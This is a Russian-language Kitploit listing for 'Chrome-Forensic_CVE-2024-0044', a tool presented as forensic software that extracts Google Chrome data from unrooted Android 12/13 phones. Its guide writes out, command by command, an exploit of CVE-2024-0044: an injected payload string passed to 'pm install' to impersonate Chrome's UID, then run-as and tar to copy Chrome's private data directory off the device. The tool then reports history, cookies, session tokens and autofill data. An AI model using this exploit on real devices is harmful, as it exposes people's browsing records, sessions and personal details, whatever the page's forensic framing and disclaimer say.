Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Безопасность AndroidАнализ уязвимостейЭксплуатацияФорензикаМобильная криминалистикаВосстановление ДанныхЦифровая криминалистикаМобильная безопасностьОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Надёжный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome на устройствах Android.

Репозиторий
1108 месяцев назадЕщё не проверено

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Мощный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome с устройств Android

Возможности • Установка • Использование • Документация


👤 Информация об авторе

Автор: JackTekno
GitHub: github.com/JackTekno


📋 Обзор

Этот инструмент использует уязвимость CVE-2024-0044 (Run-as) для обхода ограничений прав доступа на нерутированных устройствах Android 12/13, что позволяет выполнять криминалистическое извлечение данных Google Chrome. Инструмент анализирует сырые базы данных SQLite и формирует комплексные отчёты.

🔄 Процесс работы

Блок-схема криминалистического анализа

Полный рабочий процесс криминалистического анализа от сбора данных до формирования отчета


📊 Возможности и вывод

Инструмент генерирует подробный отчёт в формате Excel (result_chrome_forensic.xlsx) со следующими листами:


🛠️ Предварительные требования

Требования к оборудованию

  • 📱 Телефон Android (Android 12/13)
  • 💻 ПК (Linux/Windows/Mac)

Тестированная среда

  • 🐧 ОС: Linux UOS 20 Professional

Требования к ПО

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Файл Dummy APK (например, F-Droid.apk)

🚀 Установка

  1. Клонировать репозиторий

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Установить зависимости

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Руководство по сбору данных

Шаг 1: Подготовка устройства

  1. Перейдите в Настройки → О телефоне
  2. Нажмите Номер сборки 7 раз, чтобы включить режим разработчика
  3. Перейдите в Настройки → Система → Параметры разработчика
  4. Включите Отладку по USB
  5. Подключите телефон к ПК через USB и подтвердите подключение

Шаг 2: Подготовка эксплойта

root@kitploit:~
# Поместите фиктивный APK во временную папку
adb push F-Droid.apk /data/local/tmp/base.apk

Шаг 3: Найдите целевой UID

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Пример вывода: package:com.android.chrome uid:10129
# Запомните UID (например, 10129)

Шаг 4: Выполнение эксплойта

⚠️ Замените 10129 на фактический UID Chrome из шага 3

root@kitploit:~
adb shell

# Внутри оболочки ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Запустите менеджер пакетов
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Шаг 5: Извлечение данных

root@kitploit:~
# Всё ещё внутри оболочки ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Выйти из оболочки ADB
exit

Шаг 6: Скачать данные на ПК

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Шаг 7: Распаковать данные

Распакуйте файл 'chrome.tar' в папке проекта. Вручную перемещать файлы не нужно. Python-скрипт автоматически найдёт файлы баз данных внутри распакованных папок.

root@kitploit:~
tar -xf chrome.tar

💻 Использование

Запустите инструмент криминалистического анализа:

root@kitploit:~
python3 chrome_forensic.py

Инструмент проанализирует файлы баз данных и создаст result_chrome_forensic.xlsx в той же директории.


⚖️ Юридическое предупреждение

⚠️ ВАЖНО: Этот инструмент предназначен только для образовательных целей и авторизованного криминалистического анализа.

  • Используйте только на устройствах, которые вам принадлежат или на анализ которых вы имеете явное письменное разрешение.
  • Несанкционированный доступ к цифровым устройствам может нарушать законы вашей юрисдикции.
  • Авторы не несут ответственности за неправомерное использование данного инструмента.

🤝 Вклад

Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.


📄 Лицензия

Этот проект лицензирован под GNU General Public License v3.0. См. файл LICENSE для получения подробной информации.


👤 Благодарности

Доказательство концепции метода сбора было обобщено и опубликовано Tinyhack.com.


Сделано с ❤️ от JackTekno

⭐ Поставить звезду • 🐛 Сообщить об ошибке • 💡 Запросить функцию

Скачать инструмент
Имя листаОписание
📖 История просмотровПодробная временная шкала посещённых URL
📈 Аналитика – Топ сайтовСтатистический рейтинг наиболее посещаемых доменов
⚠️ ТРЕВОГИ – ПодозрительныеАвтоматически отмеченные URL (взлом, наркотики, контент для взрослых)
📥 ЗагрузкиИстория загрузок с указанием путей и размеров файлов
🔍 Поисковые запросыПользовательские поисковые запросы из omnibox/Google
🍪 Куки и сессииТокены сессий и метаданные куки (шестнадцатеричное шифрование)
✍️ Данные автозаполненияСохранённые данные форм (имена, адреса и т.д.)